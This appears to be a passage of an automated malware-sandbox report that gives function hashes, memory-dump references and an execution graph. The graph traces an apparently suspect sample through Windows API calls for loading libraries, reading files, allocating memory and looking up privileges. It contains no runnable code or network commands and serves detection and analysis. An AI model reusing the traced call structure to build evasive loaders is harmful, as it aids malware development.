                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 88af2a0029cea7c54079484e9eb9779eaabf754bda50c1ccd74c92c9d00433da
                                                                                                                    • Instruction ID: 5fb2087d94e682b641df854a4d6915ef65aae02e40177363084a56e96d156c9f
                                                                                                                    • Opcode Fuzzy Hash: 88af2a0029cea7c54079484e9eb9779eaabf754bda50c1ccd74c92c9d00433da
                                                                                                                    • Instruction Fuzzy Hash: 2F21F471505280DFDB06DF14D980B26BF65FB94318F20C569E8050A25AC73AD856CAA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009FD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f7c7e39a07b50d183d0115bd833a8db090e37df8285a7ea5a548295823a70d75
                                                                                                                    • Instruction ID: 6b805e98bc9a1814c123d826c37064a68cf7385c5d618a08cdc889bed3008c99
                                                                                                                    • Opcode Fuzzy Hash: f7c7e39a07b50d183d0115bd833a8db090e37df8285a7ea5a548295823a70d75
                                                                                                                    • Instruction Fuzzy Hash: 6C212575604308DFDB14DF10D884B26BB66FB84314F28C96DDA094B386CB3AD807CB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c0bb944c752b5c79f2ebcf2b7983df2e08c8a4f3b18059a6a0bf262968d3bc97
                                                                                                                    • Instruction ID: cf4fa172ca65ad4bd9f37f2e92443564128a6336896a42c72618091f6cd6604d
                                                                                                                    • Opcode Fuzzy Hash: c0bb944c752b5c79f2ebcf2b7983df2e08c8a4f3b18059a6a0bf262968d3bc97
                                                                                                                    • Instruction Fuzzy Hash: FD213771604308DFDB05DF10D9C4B26BB66FB84314F20C96DDA094B282C33AD806CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009FD006 Relevance: .1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 766777ee6ece6f2d7e8fdec654c9deb42e29ae8b16cdd3d8615ba35cd78edec6
                                                                                                                    • Instruction ID: ff37008ac0d0da6faa63146b517b53c44bb9453dffed03952d9ad917b4a95dda
                                                                                                                    • Opcode Fuzzy Hash: 766777ee6ece6f2d7e8fdec654c9deb42e29ae8b16cdd3d8615ba35cd78edec6
                                                                                                                    • Instruction Fuzzy Hash: F2219F755093C48FCB02CF24D990715BF72EB46314F28C5EAD9498F2A7C33A980ACB62
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009ED3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction ID: dea5ca5eda1ac3e0555d5ba761075546604c3931bb53577c74ea3363560f0229
                                                                                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction Fuzzy Hash: 60112676504280DFCB02CF00D5C0B16BF72FBA4324F24C2A9D8090B2A7C33AE856CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009ED4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction ID: ab6608e5d66a9e96817f547cd56b9cd513307853e5909da674b399e84f91ecc7
                                                                                                                    • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                    • Instruction Fuzzy Hash: A111E676504280DFCB16CF14D9C4B16BF72FB94324F24C6ADE8490B65AC33AD856CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369931114.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9fd000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                    • Instruction ID: 5793a618827610200e6f29f65f391ef7036bdcac8de7e3ae50244507f6fb40c6
                                                                                                                    • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                    • Instruction Fuzzy Hash: 6311DD75504284DFDB02CF10C5C0B25FBB2FB84324F24C6AED9494B296C33AD81ACBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009ED745 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: aa667bfe99a4b04410ba7797a21ea8e350cb28e6c91e9480f61ccdb9911aa6e3
                                                                                                                    • Instruction ID: dcf15e24cc0459c68c605af11cf7c7f6c5f3c1a3b486c8c183479735e9ca060d
                                                                                                                    • Opcode Fuzzy Hash: aa667bfe99a4b04410ba7797a21ea8e350cb28e6c91e9480f61ccdb9911aa6e3
                                                                                                                    • Instruction Fuzzy Hash: 6B01F7B10053849AF7215F12CC84B26BF9CEF81725F14C91AED094A282C77A9C40CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009ED744 Relevance: .0, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1472a461d7acd47186706102cfe8a0efa72ea9b7131f36651bb6f466caca5e2d
                                                                                                                    • Instruction ID: 924c573c0f0ee94f95caa6ea4b768237019715fd26d996ed964c8fae0e7c5982
                                                                                                                    • Opcode Fuzzy Hash: 1472a461d7acd47186706102cfe8a0efa72ea9b7131f36651bb6f466caca5e2d
                                                                                                                    • Instruction Fuzzy Hash: B8F06D71405384AEE7219F16C888B62FF9CEB95734F18C45AED484A286C27AAC44CBB1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00A4D484 Relevance: .3, Instructions: 264COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfbcc3d8bb51b3c54d872870f86637821682bb98710f881ad65eab21cffea3fd
                                                                                                                    • Instruction ID: 5c42f7c8aba5b620ee5360de082d4087a103e1e751ec03732c61fdef9d56e688
                                                                                                                    • Opcode Fuzzy Hash: cfbcc3d8bb51b3c54d872870f86637821682bb98710f881ad65eab21cffea3fd
                                                                                                                    • Instruction Fuzzy Hash: 5DA15A36E00209CFCF15DFA8C98459EB7B2FFC5300B25957AE905AB266DB71E916CB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:1.4%
                                                                                                                    Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                    Signature Coverage:6.1%
                                                                                                                    Total number of Nodes:560
                                                                                                                    Total number of Limit Nodes:1
                                                                                                                    execution_graph 96665 41f0f0 96666 41f0fb 96665->96666 96668 41b970 96665->96668 96669 41b996 96668->96669 96676 409d40 96669->96676 96671 41b9a2 96672 41b9c3 96671->96672 96684 40c1c0 96671->96684 96672->96666 96674 41b9b5 96720 41a6b0 96674->96720 96723 409c90 96676->96723 96678 409d4d 96679 409d54 96678->96679 96735 409c30 96678->96735 96679->96671 96685 40c1e5 96684->96685 97158 40b1c0 96685->97158 96687 40c23c 97162 40ae40 96687->97162 96689 40c262 96719 40c4b3 96689->96719 97171 4143a0 96689->97171 96691 40c2a7 96691->96719 97174 408a60 96691->97174 96693 40c2eb 96693->96719 97181 41a500 96693->97181 96697 40c341 96698 40c348 96697->96698 97193 41a010 96697->97193 96699 41bdc0 2 API calls 96698->96699 96701 40c355 96699->96701 96701->96674 96703 40c392 96704 41bdc0 2 API calls 96703->96704 96705 40c399 96704->96705 96705->96674 96706 40c3a2 96707 40f4a0 3 API calls 96706->96707 96708 40c416 96707->96708 96708->96698 96709 40c421 96708->96709 96710 41bdc0 2 API calls 96709->96710 96711 40c445 96710->96711 97198 41a060 96711->97198 96714 41a010 2 API calls 96715 40c480 96714->96715 96715->96719 97203 419e20 96715->97203 96718 41a6b0 2 API calls 96718->96719 96719->96674 96721 41af60 LdrLoadDll 96720->96721 96722 41a6cf ExitProcess 96721->96722 96722->96672 96755 418bc0 96723->96755 96727 409cb6 96727->96678 96728 409cac 96728->96727 96762 41b2b0 96728->96762 96730 409cf3 96730->96727 96773 409ab0 96730->96773 96732 409d13 96779 409620 LdrLoadDll 96732->96779 96734 409d25 96734->96678 96736 409c40 96735->96736 97132 41b5a0 96736->97132 96739 41b5a0 LdrLoadDll 96740 409c5b 96739->96740 96741 41b5a0 LdrLoadDll 96740->96741 96742 409c71 96741->96742 96743 40f180 96742->96743 96744 40f199 96743->96744 97141 40b040 96744->97141 96746 40f1ac 97145 41a1e0 96746->97145 96750 40f1d2 96751 40f1fd 96750->96751 97151 41a260 96750->97151 96753 41a490 2 API calls 96751->96753 96754 409d65 96753->96754 96754->96671 96756 418bcf 96755->96756 96780 414e50 96756->96780 96758 409ca3 96759 418a70 96758->96759 96786 41a600 96759->96786 96763 41b2c9 96762->96763 96793 414a50 96763->96793 96765 41b2e1 96766 41b2ea 96765->96766 96832 41b0f0 96765->96832 96766->96730 96768 41b2fe 96768->96766 96850 419f00 96768->96850 96774 409aca 96773->96774 97110 407ea0 96773->97110 96776 409ad1 96774->96776 97123 408160 96774->97123 96776->96732 96779->96734 96781 414e6a 96780->96781 96782 414e5e 96780->96782 96781->96758 96782->96781 96785 4152d0 LdrLoadDll 96782->96785 96784 414fbc 96784->96758 96785->96784 96789 41af60 96786->96789 96788 418a85 96788->96728 96790 41af70 96789->96790 96791 41af92 96789->96791 96792 414e50 LdrLoadDll 96790->96792 96791->96788 96792->96791 96794 414d85 96793->96794 96804 414a64 96793->96804 96794->96765 96797 414b90 96861 41a360 96797->96861 96798 414b73 96920 41a460 LdrLoadDll 96798->96920 96801 414bb7 96803 41bdc0 2 API calls 96801->96803 96802 414b7d 96802->96765 96806 414bc3 96803->96806 96804->96794 96858 419c50 96804->96858 96805 414d49 96808 41a490 2 API calls 96805->96808 96806->96802 96806->96805 96807 414d5f 96806->96807 96812 414c52 96806->96812 96929 414790 LdrLoadDll NtReadFile NtClose 96807->96929 96809 414d50 96808->96809 96809->96765 96811 414d72 96811->96765 96813 414cb9 96812->96813 96815 414c61 96812->96815 96813->96805 96814 414ccc 96813->96814 96922 41a2e0 96814->96922 96817 414c66 96815->96817 96818 414c7a 96815->96818 96921 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 96817->96921 96821 414c97 96818->96821 96822 414c7f 96818->96822 96821->96809 96877 414410 96821->96877 96865 4146f0 96822->96865 96824 414c70 96824->96765 96826 414c8d 96826->96765 96828 414d2c 96926 41a490 96828->96926 96829 414caf 96829->96765 96831 414d38 96831->96765 96834 41b101 96832->96834 96833 41b113 96833->96768 96834->96833 96947 41bd40 96834->96947 96836 41b134 96950 414070 96836->96950 96838 41b180 96838->96768 96839 41b157 96839->96838 96840 414070 3 API calls 96839->96840 96842 41b179 96840->96842 96842->96838 96982 415390 96842->96982 96843 41b20a 96844 41b21a 96843->96844 97076 41af00 LdrLoadDll 96843->97076 96992 41ad70 96844->96992 96847 41b248 97071 419ec0 96847->97071 96851 41af60 LdrLoadDll 96850->96851 96852 419f1c 96851->96852 97104 1a32c0a 96852->97104 96853 419f37 96855 41bdc0 96853->96855 97107 41a670 96855->97107 96857 41b359 96857->96730 96859 414b44 96858->96859 96860 41af60 LdrLoadDll 96858->96860 96859->96797 96859->96798 96859->96802 96860->96859 96862 41a376 96861->96862 96863 41af60 LdrLoadDll 96862->96863 96864 41a37c NtCreateFile 96863->96864 96864->96801 96866 41470c 96865->96866 96867 41a2e0 LdrLoadDll 96866->96867 96868 41472d 96867->96868 96869 414734 96868->96869 96870 414748 96868->96870 96871 41a490 2 API calls 96869->96871 96872 41a490 2 API calls 96870->96872 96874 41473d 96871->96874 96873 414751 96872->96873 96930 41bfd0 LdrLoadDll RtlAllocateHeap 96873->96930 96874->96826 96876 41475c 96876->96826 96878 41445b 96877->96878 96879 41448e 96877->96879 96880 41a2e0 LdrLoadDll 96878->96880 96881 4145d9 96879->96881 96884 4144aa 96879->96884 96882 414476 96880->96882 96883 41a2e0 LdrLoadDll 96881->96883 96885 41a490 2 API calls 96882->96885 96886 4145f4 96883->96886 96887 41a2e0 LdrLoadDll 96884->96887 96888 41447f 96885->96888 96943 41a320 LdrLoadDll NtCreateFile 96886->96943 96890 4144c5 96887->96890 96888->96829 96892 4144e1 96890->96892 96893 4144cc 96890->96893 96896 4144e6 96892->96896 96902 4144fc 96892->96902 96895 41a490 2 API calls 96893->96895 96894 41462e 96897 41a490 2 API calls 96894->96897 96898 4144d5 96895->96898 96899 41a490 2 API calls 96896->96899 96900 414639 96897->96900 96898->96829 96901 4144ef 96899->96901 96900->96829 96901->96829 96903 414501 96902->96903 96931 41bf90 96902->96931 96907 414513 96903->96907 96934 41a410 96903->96934 96906 414567 96908 41457e 96906->96908 96942 41a2a0 LdrLoadDll 96906->96942 96907->96829 96910 414585 96908->96910 96911 41459a 96908->96911 96913 41a490 2 API calls 96910->96913 96912 41a490 2 API calls 96911->96912 96914 4145a3 96912->96914 96913->96907 96915 4145cf 96914->96915 96937 41bb90 96914->96937 96915->96829 96917 4145ba 96918 41bdc0 2 API calls 96917->96918 96919 4145c3 96918->96919 96919->96829 96920->96802 96921->96824 96923 41af60 LdrLoadDll 96922->96923 96924 414d14 96923->96924 96925 41a320 LdrLoadDll NtCreateFile 96924->96925 96925->96828 96927 41af60 LdrLoadDll 96926->96927 96928 41a4ac NtClose 96927->96928 96928->96831 96929->96811 96930->96876 96944 41a630 96931->96944 96933 41bfa8 96933->96903 96935 41a42c NtReadFile 96934->96935 96936 41af60 LdrLoadDll 96934->96936 96935->96906 96936->96935 96938 41bbb4 96937->96938 96939 41bb9d 96937->96939 96938->96917 96939->96938 96940 41bf90 2 API calls 96939->96940 96941 41bbcb 96940->96941 96941->96917 96942->96908 96943->96894 96945 41af60 LdrLoadDll 96944->96945 96946 41a64c RtlAllocateHeap 96945->96946 96946->96933 97077 41a540 96947->97077 96949 41bd6d 96949->96836 96951 414081 96950->96951 96953 414089 96950->96953 96951->96839 96952 41435c 96952->96839 96953->96952 97080 41cf30 96953->97080 96955 4140dd 96956 41cf30 2 API calls 96955->96956 96959 4140e8 96956->96959 96957 414136 96960 41cf30 2 API calls 96957->96960 96959->96957 96961 41d060 3 API calls 96959->96961 97091 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 96959->97091 96963 41414a 96960->96963 96961->96959 96962 4141a7 96964 41cf30 2 API calls 96962->96964 96963->96962 97085 41d060 96963->97085 96966 4141bd 96964->96966 96967 4141fa 96966->96967 96969 41d060 3 API calls 96966->96969 96968 41cf30 2 API calls 96967->96968 96970 414205 96968->96970 96969->96966 96971 41d060 3 API calls 96970->96971 96977 41423f 96970->96977 96971->96970 96973 414334 97093 41cf90 LdrLoadDll RtlFreeHeap 96973->97093 96975 41433e 97094 41cf90 LdrLoadDll RtlFreeHeap 96975->97094 97092 41cf90 LdrLoadDll RtlFreeHeap 96977->97092 96978 414348 97095 41cf90 LdrLoadDll RtlFreeHeap 96978->97095 96980 414352 97096 41cf90 LdrLoadDll RtlFreeHeap 96980->97096 96983 4153a1 96982->96983 96984 414a50 9 API calls 96983->96984 96986 4153b7 96984->96986 96985 41540a 96985->96843 96986->96985 96987 4153f2 96986->96987 96988 415405 96986->96988 96989 41bdc0 2 API calls 96987->96989 96990 41bdc0 2 API calls 96988->96990 96991 4153f7 96989->96991 96990->96985 96991->96843 96993 41ad84 96992->96993 96994 41ac30 LdrLoadDll 96992->96994 97097 41ac30 96993->97097 96994->96993 96997 41ac30 LdrLoadDll 96998 41ad96 96997->96998 96999 41ac30 LdrLoadDll 96998->96999 97000 41ad9f 96999->97000 97001 41ac30 LdrLoadDll 97000->97001 97002 41ada8 97001->97002 97003 41ac30 LdrLoadDll 97002->97003 97004 41adb1 97003->97004 97005 41ac30 LdrLoadDll 97004->97005 97006 41adbd 97005->97006 97007 41ac30 LdrLoadDll 97006->97007 97008 41adc6 97007->97008 97009 41ac30 LdrLoadDll 97008->97009 97010 41adcf 97009->97010 97011 41ac30 LdrLoadDll 97010->97011 97012 41add8 97011->97012 97013 41ac30 LdrLoadDll 97012->97013 97014 41ade1 97013->97014 97015 41ac30 LdrLoadDll 97014->97015 97016 41adea 97015->97016 97017 41ac30 LdrLoadDll 97016->97017 97018 41adf6 97017->97018 97019 41ac30 LdrLoadDll 97018->97019 97020 41adff 97019->97020 97021 41ac30 LdrLoadDll 97020->97021 97022 41ae08 97021->97022 97023 41ac30 LdrLoadDll 97022->97023 97024 41ae11 97023->97024 97025 41ac30 LdrLoadDll 97024->97025 97026 41ae1a 97025->97026 97027 41ac30 LdrLoadDll 97026->97027 97028 41ae23 97027->97028 97029 41ac30 LdrLoadDll 97028->97029 97030 41ae2f 97029->97030 97031 41ac30 LdrLoadDll 97030->97031 97032 41ae38 97031->97032 97033 41ac30 LdrLoadDll 97032->97033 97034 41ae41 97033->97034 97035 41ac30 LdrLoadDll 97034->97035 97036 41ae4a 97035->97036 97037 41ac30 LdrLoadDll 97036->97037 97038 41ae53 97037->97038 97039 41ac30 LdrLoadDll 97038->97039 97040 41ae5c 97039->97040 97041 41ac30 LdrLoadDll 97040->97041 97042 41ae68 97041->97042 97043 41ac30 LdrLoadDll 97042->97043 97044 41ae71 97043->97044 97045 41ac30 LdrLoadDll 97044->97045 97046 41ae7a 97045->97046 97047 41ac30 LdrLoadDll 97046->97047 97048 41ae83 97047->97048 97049 41ac30 LdrLoadDll 97048->97049 97050 41ae8c 97049->97050 97051 41ac30 LdrLoadDll 97050->97051 97052 41ae95 97051->97052 97053 41ac30 LdrLoadDll 97052->97053 97054 41aea1 97053->97054 97055 41ac30 LdrLoadDll 97054->97055 97056 41aeaa 97055->97056 97057 41ac30 LdrLoadDll 97056->97057 97058 41aeb3 97057->97058 97059 41ac30 LdrLoadDll 97058->97059 97060 41aebc 97059->97060 97061 41ac30 LdrLoadDll 97060->97061 97062 41aec5 97061->97062 97063 41ac30 LdrLoadDll 97062->97063 97064 41aece 97063->97064 97065 41ac30 LdrLoadDll 97064->97065 97066 41aeda 97065->97066 97067 41ac30 LdrLoadDll 97066->97067 97068 41aee3 97067->97068 97069 41ac30 LdrLoadDll 97068->97069 97070 41aeec 97069->97070 97070->96847 97072 41af60 LdrLoadDll 97071->97072 97073 419edc 97072->97073 97103 1a32df0 LdrInitializeThunk 97073->97103 97074 419ef3 97074->96768 97076->96844 97078 41af60 LdrLoadDll 97077->97078 97079 41a55c NtAllocateVirtualMemory 97078->97079 97079->96949 97081 41cf40 97080->97081 97082 41cf46 97080->97082 97081->96955 97083 41bf90 2 API calls 97082->97083 97084 41cf6c 97083->97084 97084->96955 97086 41cfd0 97085->97086 97087 41d02d 97086->97087 97088 41bf90 2 API calls 97086->97088 97087->96963 97089 41d00a 97088->97089 97090 41bdc0 2 API calls 97089->97090 97090->97087 97091->96959 97092->96973 97093->96975 97094->96978 97095->96980 97096->96952 97098 41ac4b 97097->97098 97099 414e50 LdrLoadDll 97098->97099 97100 41ac6b 97099->97100 97101 414e50 LdrLoadDll 97100->97101 97102 41ad17 97100->97102 97101->97102 97102->96997 97103->97074 97105 1a32c11 97104->97105 97106 1a32c1f LdrInitializeThunk 97104->97106 97105->96853 97106->96853 97108 41af60 LdrLoadDll 97107->97108 97109 41a68c RtlFreeHeap 97108->97109 97109->96857 97111 407eb0 97110->97111 97112 407eab 97110->97112 97113 41bd40 2 API calls 97111->97113 97112->96774 97116 407ed5 97113->97116 97114 407f38 97114->96774 97115 419ec0 2 API calls 97115->97116 97116->97114 97116->97115 97117 407f3e 97116->97117 97121 41bd40 2 API calls 97116->97121 97126 41a5c0 97116->97126 97119 407f64 97117->97119 97120 41a5c0 2 API calls 97117->97120 97119->96774 97122 407f55 97120->97122 97121->97116 97122->96774 97124 40817e 97123->97124 97125 41a5c0 2 API calls 97123->97125 97124->96732 97125->97124 97127 41af60 LdrLoadDll 97126->97127 97128 41a5dc 97127->97128 97131 1a32c70 LdrInitializeThunk 97128->97131 97129 41a5f3 97129->97116 97131->97129 97133 41b5c3 97132->97133 97136 40acf0 97133->97136 97135 409c4a 97135->96739 97138 40ad14 97136->97138 97137 40ad1b 97137->97135 97138->97137 97139 40ad50 LdrLoadDll 97138->97139 97140 40ad67 97138->97140 97139->97140 97140->97135 97142 40b063 97141->97142 97144 40b0e0 97142->97144 97156 419c90 LdrLoadDll 97142->97156 97144->96746 97146 41af60 LdrLoadDll 97145->97146 97147 40f1bb 97146->97147 97147->96754 97148 41a7d0 97147->97148 97149 41a7ef LookupPrivilegeValueW 97148->97149 97150 41af60 LdrLoadDll 97148->97150 97149->96750 97150->97149 97152 41a27c 97151->97152 97153 41af60 LdrLoadDll 97151->97153 97157 1a32ea0 LdrInitializeThunk 97152->97157 97153->97152 97154 41a29b 97154->96751 97156->97144 97157->97154 97159 40b1c9 97158->97159 97160 40b040 LdrLoadDll 97159->97160 97161 40b204 97160->97161 97161->96687 97163 40ae51 97162->97163 97164 40ae4d 97162->97164 97165 40ae6a 97163->97165 97166 40ae9c 97163->97166 97164->96689 97208 419cd0 LdrLoadDll 97165->97208 97209 419cd0 LdrLoadDll 97166->97209 97168 40aead 97168->96689 97170 40ae8c 97170->96689 97172 40f4a0 3 API calls 97171->97172 97173 4143c6 97171->97173 97172->97173 97173->96691 97175 408a79 97174->97175 97210 4087a0 97174->97210 97177 4087a0 20 API calls 97175->97177 97180 408a9d 97175->97180 97178 408a8a 97177->97178 97178->97180 97228 40f710 11 API calls 97178->97228 97180->96693 97182 41af60 LdrLoadDll 97181->97182 97183 41a51c 97182->97183 97347 1a32e80 LdrInitializeThunk 97183->97347 97184 40c322 97186 40f4a0 97184->97186 97187 40f4bd 97186->97187 97348 419fc0 97187->97348 97190 40f505 97190->96697 97191 41a010 2 API calls 97192 40f52e 97191->97192 97192->96697 97194 41a02c 97193->97194 97195 41af60 LdrLoadDll 97193->97195 97354 1a32d10 LdrInitializeThunk 97194->97354 97195->97194 97196 40c385 97196->96703 97196->96706 97199 41af60 LdrLoadDll 97198->97199 97200 41a07c 97199->97200 97355 1a32d30 LdrInitializeThunk 97200->97355 97201 40c459 97201->96714 97204 41af60 LdrLoadDll 97203->97204 97205 419e3c 97204->97205 97356 1a32fb0 LdrInitializeThunk 97205->97356 97206 40c4ac 97206->96718 97208->97170 97209->97168 97211 407ea0 4 API calls 97210->97211 97212 4087ba 97211->97212 97213 408a3f 97212->97213 97215 408a49 97212->97215 97218 419f00 2 API calls 97212->97218 97220 41a490 LdrLoadDll NtClose 97212->97220 97223 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97212->97223 97226 419e20 2 API calls 97212->97226 97229 419d10 97212->97229 97232 4085d0 97212->97232 97244 40f5f0 LdrLoadDll NtClose 97212->97244 97245 419d90 LdrLoadDll 97212->97245 97246 419dc0 LdrLoadDll 97212->97246 97247 419e50 LdrLoadDll 97212->97247 97248 4083a0 97212->97248 97264 405f60 LdrLoadDll 97212->97264 97214 408160 2 API calls 97213->97214 97214->97215 97215->97175 97218->97212 97220->97212 97223->97212 97226->97212 97228->97180 97230 419d2c 97229->97230 97231 41af60 LdrLoadDll 97229->97231 97230->97212 97231->97230 97233 4085e6 97232->97233 97265 419880 97233->97265 97235 4085ff 97240 408771 97235->97240 97286 4081a0 97235->97286 97237 4086e5 97238 4083a0 12 API calls 97237->97238 97237->97240 97239 408713 97238->97239 97239->97240 97241 419f00 2 API calls 97239->97241 97240->97212 97242 408748 97241->97242 97242->97240 97243 41a500 2 API calls 97242->97243 97243->97240 97244->97212 97245->97212 97246->97212 97247->97212 97249 4083c9 97248->97249 97326 408310 97249->97326 97252 41a500 2 API calls 97253 4083dc 97252->97253 97253->97252 97254 408467 97253->97254 97257 408462 97253->97257 97334 40f670 97253->97334 97254->97212 97255 41a490 2 API calls 97256 40849a 97255->97256 97256->97254 97258 419d10 LdrLoadDll 97256->97258 97257->97255 97259 4084ff 97258->97259 97259->97254 97338 419d50 97259->97338 97261 408563 97261->97254 97262 414a50 9 API calls 97261->97262 97263 4085b8 97262->97263 97263->97212 97264->97212 97266 41bf90 2 API calls 97265->97266 97267 419897 97266->97267 97293 409310 97267->97293 97269 4198b2 97270 4198f0 97269->97270 97271 4198d9 97269->97271 97274 41bd40 2 API calls 97270->97274 97272 41bdc0 2 API calls 97271->97272 97273 4198e6 97272->97273 97273->97235 97275 41992a 97274->97275 97276 41bd40 2 API calls 97275->97276 97277 419943 97276->97277 97281 419be4 97277->97281 97299 41bd80 97277->97299 97280 419bd0 97282 41bdc0 2 API calls 97280->97282 97284 41bdc0 2 API calls 97281->97284 97283 419bda 97282->97283 97283->97235 97285 419c39 97284->97285 97285->97235 97287 40829f 97286->97287 97288 4081b5 97286->97288 97287->97237 97288->97287 97289 414a50 9 API calls 97288->97289 97290 408222 97289->97290 97291 41bdc0 2 API calls 97290->97291 97292 408249 97290->97292 97291->97292 97292->97237 97294 409335 97293->97294 97295 40acf0 LdrLoadDll 97294->97295 97296 409366 97295->97296 97298 40938d 97296->97298 97302 40cf20 97296->97302 97298->97269 97320 41a580 